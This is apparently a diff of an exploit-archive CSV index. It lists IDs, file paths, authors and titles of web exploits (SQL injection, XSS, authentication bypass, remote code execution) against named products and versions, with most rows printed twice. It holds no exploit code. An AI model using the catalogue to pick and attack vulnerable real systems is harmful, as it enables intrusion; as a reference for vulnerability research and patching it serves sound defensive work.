49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",1970-01-01,Luca.Chiou,webapps,multiple, 49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",1970-01-01,Luca.Chiou,webapps,multiple,
49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)",1970-01-01,"Avinash R",webapps,php,
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",1970-01-01,securityforeveryone.com,webapps,php, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",1970-01-01,securityforeveryone.com,webapps,php,
49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple, 49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple, 49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
@ -44215,7 +44164,6 @@ id,file,description,date,author,type,platform,port
50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php, 50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64,
50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",1970-01-01,"Fatih İLGİN",webapps,php, 50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",1970-01-01,"Fatih İLGİN",webapps,php,
50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass",1970-01-01,"Ron Jost",webapps,php,
50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php, 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",1970-01-01,nhattruong,webapps,php, 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",1970-01-01,nhattruong,webapps,php,
50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",1970-01-01,ahmed,webapps,php, 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",1970-01-01,ahmed,webapps,php,
@ -44239,7 +44187,6 @@ id,file,description,date,author,type,platform,port
50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",1970-01-01,"Berk Can Geyikci",webapps,php, 50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",1970-01-01,"Berk Can Geyikci",webapps,php,
50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",1970-01-01,"Berk Can Geyikci",webapps,php, 50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",1970-01-01,"Berk Can Geyikci",webapps,php,
50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",1970-01-01,"Rinku Kumar",webapps,php, 50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",1970-01-01,"Rinku Kumar",webapps,php,
50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,CHackA0101,webapps,multiple,
50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm, 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm,
50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware,
50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux, 50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux,
@ -44257,7 +44204,6 @@ id,file,description,date,author,type,platform,port
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",1970-01-01,"Salman Asad",webapps,php, 50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",1970-01-01,"Salman Asad",webapps,php,
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple, 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)",1970-01-01,"Stig Magnus Baugstø",webapps,multiple,
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware, 50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware,
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,php, 50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,php,
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@ -44267,7 +44213,6 @@ id,file,description,date,author,type,platform,port
50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php, 50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",1970-01-01,Geiseric,webapps,php, 50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",1970-01-01,Geiseric,webapps,php,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php, 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50090,exploits/php/webapps/50090.txt,"Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@ -44292,14 +44237,12 @@ id,file,description,date,author,type,platform,port
50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",1970-01-01,faisalfs10x,webapps,php, 50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",1970-01-01,faisalfs10x,webapps,php,
50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",1970-01-01,"Eleonora Guardini",webapps,php, 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",1970-01-01,"Eleonora Guardini",webapps,php,
50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",1970-01-01,"Central InfoSec",webapps,multiple, 50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",1970-01-01,"Central InfoSec",webapps,multiple,
50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Swapnil Subhash Bodekar",webapps,php, 50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Swapnil Subhash Bodekar",webapps,php,
50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",1970-01-01,"Central InfoSec",webapps,multiple, 50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",1970-01-01,"Central InfoSec",webapps,multiple,
50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php, 50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php, 50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php, 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)",1970-01-01,"Vikas Srivastava",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php, 50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php, 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Photubias,webapps,java, 50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Photubias,webapps,java,
@ -44311,7 +44254,6 @@ id,file,description,date,author,type,platform,port
50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",1970-01-01,faisalfs10x,webapps,php, 50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",1970-01-01,faisalfs10x,webapps,php,
50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aakash Choudhary",webapps,php, 50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aakash Choudhary",webapps,php,
50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",1970-01-01,Mesh3l_911,webapps,linux, 50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",1970-01-01,Mesh3l_911,webapps,linux,
50146,exploits/hardware/webapps/50146.txt,"KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",1970-01-01,faisalfs10x,webapps,php, 50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",1970-01-01,faisalfs10x,webapps,php,
50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",1970-01-01,r0ny,webapps,multiple, 50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",1970-01-01,r0ny,webapps,multiple,
@ -44321,29 +44263,24 @@ id,file,description,date,author,type,platform,port
50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php, 50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",1970-01-01,S1lv3r,webapps,php, 50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",1970-01-01,S1lv3r,webapps,php,
50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",1970-01-01,Shafique_Wasta,webapps,php, 50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",1970-01-01,Shafique_Wasta,webapps,php,
50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass & RCE",1970-01-01,"Javier Olmedo",webapps,php,
50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",1970-01-01,"Sedric Louissaint",webapps,windows, 50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",1970-01-01,"Sedric Louissaint",webapps,windows,
50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",1970-01-01,"Ivan Nikolsky",webapps,hardware, 50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",1970-01-01,"Ivan Nikolsky",webapps,hardware,
50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",1970-01-01,LiquidWorm,webapps,hardware, 50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",1970-01-01,LiquidWorm,webapps,hardware,
50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",1970-01-01,LiquidWorm,webapps,aspx, 50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",1970-01-01,LiquidWorm,webapps,aspx,
50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php, 50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)",1970-01-01,niebardzo,webapps,java,
50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",1970-01-01,"J. Francisco Bolivar",webapps,multiple, 50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",1970-01-01,"J. Francisco Bolivar",webapps,multiple,
50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Akshay Khanna",webapps,php, 50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Akshay Khanna",webapps,php,
50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php, 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",1970-01-01,LiquidWorm,webapps,hardware,
50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",1970-01-01,"Merbin Russel",webapps,php, 50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",1970-01-01,"Merbin Russel",webapps,php,
50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php, 50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php,
50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Leon Trappett",webapps,php, 50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Leon Trappett",webapps,php,
50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",1970-01-01,"Leon Trappett",webapps,php, 50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",1970-01-01,"Leon Trappett",webapps,php,
50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php, 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",1970-01-01,"Adrián Díaz",webapps,java,
50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,splint3rsec,webapps,php, 50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,splint3rsec,webapps,php,
50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,lanz,webapps,php, 50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,lanz,webapps,php,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",1970-01-01,"Amin Bohio",webapps,multiple, 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",1970-01-01,"Amin Bohio",webapps,multiple,
50183,exploits/cgi/webapps/50183.py,"IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,cgi, 50183,exploits/cgi/webapps/50183.py,"IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,cgi,
50185,exploits/multiple/webapps/50185.py,"Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection",1970-01-01,"Brian Ombongi",webapps,multiple, 50185,exploits/multiple/webapps/50185.py,"Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection",1970-01-01,"Brian Ombongi",webapps,multiple,
50186,exploits/php/webapps/50186.txt,"WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR",1970-01-01,Captain_hook,webapps,php,
50187,exploits/php/webapps/50187.txt,"WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php, 50187,exploits/php/webapps/50187.txt,"WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php,
50189,exploits/php/webapps/50189.txt,"Simple Library Management System 1.0 - 'rollno' SQL Injection",1970-01-01,"Halit AKAYDIN",webapps,php, 50189,exploits/php/webapps/50189.txt,"Simple Library Management System 1.0 - 'rollno' SQL Injection",1970-01-01,"Halit AKAYDIN",webapps,php,
50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",1970-01-01,"Ashish Upsham",webapps,php, 50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",1970-01-01,"Ashish Upsham",webapps,php,
@ -44363,7 +44300,6 @@ id,file,description,date,author,type,platform,port
50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE",1970-01-01,"Ken Pyle",webapps,hardware,
50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Davide Taraschi",webapps,php, 50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Davide Taraschi",webapps,php,
50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php, 50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",1970-01-01,"Halit AKAYDIN",webapps,php, 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",1970-01-01,"Halit AKAYDIN",webapps,php,
@ -44386,26 +44322,21 @@ id,file,description,date,author,type,platform,port
50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"David Utón",webapps,multiple, 50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"David Utón",webapps,multiple,
50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Musyoka Ian",webapps,multiple, 50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Musyoka Ian",webapps,multiple,
50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",1970-01-01,"Abdullah Kala",webapps,php, 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",1970-01-01,"Abdullah Kala",webapps,php,
50241,exploits/aspx/webapps/50241.py,"Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)",1970-01-01,BitTheByte,webapps,aspx,
50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php, 50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php,
50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java, 50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java,
50244,exploits/php/webapps/50244.py,"Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php, 50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php,
